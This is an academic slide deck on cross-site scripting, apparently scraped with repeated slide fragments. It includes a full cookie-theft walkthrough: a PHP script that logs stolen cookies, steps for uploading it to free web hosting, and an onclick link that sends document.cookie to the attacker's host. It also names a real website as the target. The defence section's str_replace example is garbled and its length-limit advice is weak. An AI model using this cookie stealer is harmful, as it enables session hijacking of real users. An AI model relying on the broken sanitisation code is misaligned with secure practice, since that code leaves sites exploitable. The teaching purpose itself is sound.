Cross-Site-Scripting (XSS) Ravi 22 09

Cross-Site-Scripting (xss)
Attack and Protection Mechanisms

Overview :
What is XSS ?
Types of XSS
XSS Attack - General Overview
Required Tools
Scenario
Code
How to counter XSS Attack ?
Questions
12/09/2021 Division Of Computer Engineering, SOE 2

What is XSS ?
Cross-site scripting (XSS) is a type of computer
security vulnerability typically found in web
applications which allow code injection by malicious
web users into the web pages viewed by other users.
Examples of such code include HTML code and client-
side scripts.
Vulnerabilities of this kind have been exploited to

craft powerful phishing attacks and browser exploits

XSS-Attack: General Overview
Attacker Web Server
Post Forum Message: Did you know this?
Subject: GET Money for FREE !!! .....
GET Money for FREE !!!
Body:
<script> attack code </script>
<script> attack code </script>
Re: Error message on startup
.....
I found a solution!
.....
Can anybody help?
.....
Error message on startup
Get /forum.jsp?fid=122&mid=2241
.....
1. Attacker sends malicious code

2. Server stores message GET Money for FREE !!!
This is only one <script> attack code </script>
3.example out of many

User requests message
attack
4. Message scenarios!
is delivered by server Client
5. Browser executes script in message !!! attack code !!!
4
Required Tools:-
1. Computer
2. Internet
3. Mozila Firefox 3.0 or Higher
4. Firebug Add-on for Mozila
5. Firecookie extension for Firebug
6. Targer website(www.shtyle.fm)
7. Web Hosting
e.g: www.0fees.net,5gigs.net

Scenario:
1. www.xyz.com a website vulnerable to XSS.
2. When its member logined, system will create a cookie to

keep him logined.
3. Its members can post something, including html/java script

code in the textbox,and even other non-logined usered users
can see that text.
4. So an attacker puts a link in the textbox to trap other

members.
5. That link actually will execute a cookie stealing script that
attacker has uploaded into a web hosting before.
6. If another member see and click that link, his/her cookie

will be recorded in a text file located in attaker’s web
hosting.
7.Then, attacker open that text file,get the cookie name and
values.
8.Using firebug and firecookie add-ons in Mozila,he can copy

that cookie into browser and login to xyz.com using victim’s
account, even without knowing his victim password.

Script which steal user’s Cookie:
<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$date = date(“| ds of F Y h:i:s A”);
$user_agent = $_SERVER[‘HTTP_user_AGENT’];
$file=fopen(‘’log.txt,’a’);
fwrite($file,”DATE:$date || USER_AGENT:$user_agent||cookie:$cookie\n”);
fclose($file);
echo “<b>Sorry,this page is under construction</b><br>Please Click<a

href=“http://www.any_website_name/”>here</a>to go back to previous page”
?>
* Save this as something.php

Create one text file – “log.txt”.
Upload the two file – something.php & log.txt – into a web

hosting site.
And give the user following link:

<a>
onclick=“document.location=
http://site_address_where_something.php_is_hosted/som
ething.php?
+escape(document.cookie);”href=“#”>Click Here for Detail
</a>

How to counter this
XSS Attack ?

1. Limit input fields to the maximum length expected because most of the
script requires long text.
2. Logoff immediately after using a Web application as attacker can not use
your cookie if you logoff.
3. Do not allow your browser to save username/passwords, and do not allow

sites to “remember” your login.
4. Notice and be careful with the link that you want to click
5. Encode user inputs, like

< replaced to &lt ;
> replaced to &gt ;
“ replaced to &quot ;

( replaced to &#40 ;
) replaced to &#41 ;
# replaced to &#35 ;
& replaced to &amp ;
-------------------------------------------------------------------
Example : -
<script> replaced to <script&gt
• using str_replace() function in PHP.
• str_replace(“<scritpt>”,”<script;&gt”);
so, browser will not execute the HTML or Java Script code

QUESTIONS

Cross-Site-Scripting (XSS) Ravi 22 09

Uploaded by

Copyright:

Available Formats

You might also like

Cross-Site-Scripting (XSS) Ravi 22 09

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Cross-Site-Scripting (XSS) Ravi 22 09

Uploaded by

Copyright:

Available Formats

Cross-Site-Scripting (xss)

Attack and Protection Mechanisms

12/09/2021 Division Of Computer Engineering, SOE 2

Vulnerabilities of this kind have been exploited to

12/09/2021 Division Of Computer Engineering, SOE 3

1. Attacker sends malicious code

3.example out of many

12/09/2021 Division Of Computer Engineering, SOE 6

2. When its member logined, system will create a cookie to

3. Its members can post something, including html/java script

4. So an attacker puts a link in the textbox to trap other

6. If another member see and click that link, his/her cookie

8.Using firebug and firecookie add-ons in Mozila,he can copy

12/09/2021 Division Of Computer Engineering, SOE 9

echo “<b>Sorry,this page is under construction</b><br>Please Click<a

* Save this as something.php

12/09/2021 Division Of Computer Engineering, SOE 11

Upload the two file – something.php & log.txt – into a web

And give the user following link:

12/09/2021 Division Of Computer Engineering, SOE 13

12/09/2021 Division Of Computer Engineering, SOE 65

3. Do not allow your browser to save username/passwords, and do not allow

5. Encode user inputs, like

12/09/2021 Division Of Computer Engineering, SOE 66

12/09/2021 Division Of Computer Engineering, SOE 67

12/09/2021 Division Of Computer Engineering, SOE 69

You might also like